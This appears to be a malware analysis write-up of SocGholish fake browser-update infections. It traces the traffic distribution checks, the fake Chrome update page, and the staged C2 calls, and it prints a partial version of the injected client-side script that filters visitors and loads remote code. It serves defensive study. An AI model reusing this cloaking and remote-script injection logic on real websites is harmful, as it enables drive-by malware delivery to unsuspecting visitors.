SocGholish is a malware family that can be found on compromised web sites. When users land on these sites they may get presented with a fake update. Whether or not the fake update is displayed is dependent on numerous factors. For example, the site will check your source IP for anything that might indicate you’re not a standard end user. Additionally if you have visited the site already it will have stored a cookie. If you already have the cookie then you will not see the fake update.

To help with consistently getting SocGholish to trigger, these were the steps used besides using a throwaway sandbox.

  1. Use a hotspot that you can turn the Wi-Fi on/off . This allows for a fresh IP for each session.
  2. Clear all browser data.

Update Chrome

Server side checks appear to be made to decide if the fake update should be delivered. If the checks pass, it will prepend code to the main page with calls to a TDS (traffic distribution system).

<script src=""></script>
var khutmhpx = document.createElement("script");
khutmhpx.src = "";

Oddly it injects this same script numerous times. While several may be unique hosts, perhaps to get around potential blocks, it’s common to see it reference an identical src.

Index infected

Each of these duplicate snippets return the same thing, a call to the same next TDS layer.


The first call to the second layer TDS is for Javascript to perform client side checks. In general SocGolish only wants to trigger once for a brand new visitor. It checks for a few attributes. Interestingly it appears to still make a web call even when the environment is deemed not good for the fake update. Perhaps this is for analytics? The analytics calls return empty payloads.

(function() {
    // event is sent to a Window when the browser hides the current page in the process of presenting a different page from the session's history
    window.addEventListener('pagehide', function(event) {
    }, true);

    if (window.navigator.userAgent.indexOf('Windows') == -1) {
        // ignore non-Windows agents
    if (window.localStorage[window.location.hostname]) {
        // previously triggered.  This will be set by the next call if trigger happens.
    if (document.cookie.indexOf('wordpress_logged_in_') !== -1 || document.cookie.indexOf('wp-settings-') !== -1) {
        // existing WordPress user or admin
    if (typeof window.jQueryLanding !== 'undefined') {
        // finally!  This will move onto the next phase
    // set a global variable to help prevent this script from triggering again
    // no doubt this helps with the multiple redundant injections of the main page
    window.jQueryLanding = true;


    function fp(jq) {
        var bh = document.createElement('script');
        bh.async = true;
        bh.src = jq;
        var vj = document.getElementsByTagName('script')[0];
        vj.parentNode.insertBefore(bh, vj);

If the client checks passed, then the JS/HTML for the fake update will be fetched and displayed. This includes saving a value in local storage to help prevent additional triggering.

Fake update html

In addition to the image assets, a JS is fetched that contains what will ultimately become the file the user downloads.

update.js inside JS

When the user clicks on the Update Chrome button, it emulates a download of the file Update.js which lands in the end user’s Download folder.

If the end user then clicks on the “downloaded” file, Windows will use wscript to locally run the obfuscated Javascript.

Deobfuscated, the Javascript is a call to the C2 for additional Javascript that will be evaluated.

update.js cleaned up

The first call to the C2 returns Javascript that collects information about the Windows environment.

C2 call 1

The collected data is sent in the second call to the C2.

The C2 will make a judgement call about the data collected. If the workstation is of interest, further Javascript will be returned. If the C2 is not interested, then an empty payload will be returned.

In order to get the second call to respond with a payload, Custom Rules were created in Fiddler.

Fiddler custom rules

If the C2 is happy with the data sent in the second call, it will respond with a simple Javascript that makes the third call to the C2 but with a new endpoint URL. Here it is deobfuscated.

C2 call 2

The third call to the C2 returns another round of workstation information gathering.

C2 call 3

The fourth call to the C2 sends the larger set of data that was gathered.

The JS from the third call then moves onto the hearbeat phase. It will evaluate whatever the C2 returns.

C2 heartbeat JS

C2 heartbeat

Presumably at this point the victim workstation is listed in the threat actor’s dashboard waiting for servicing?

SocGholish Video


TDS - First layer


TDS - Second layer


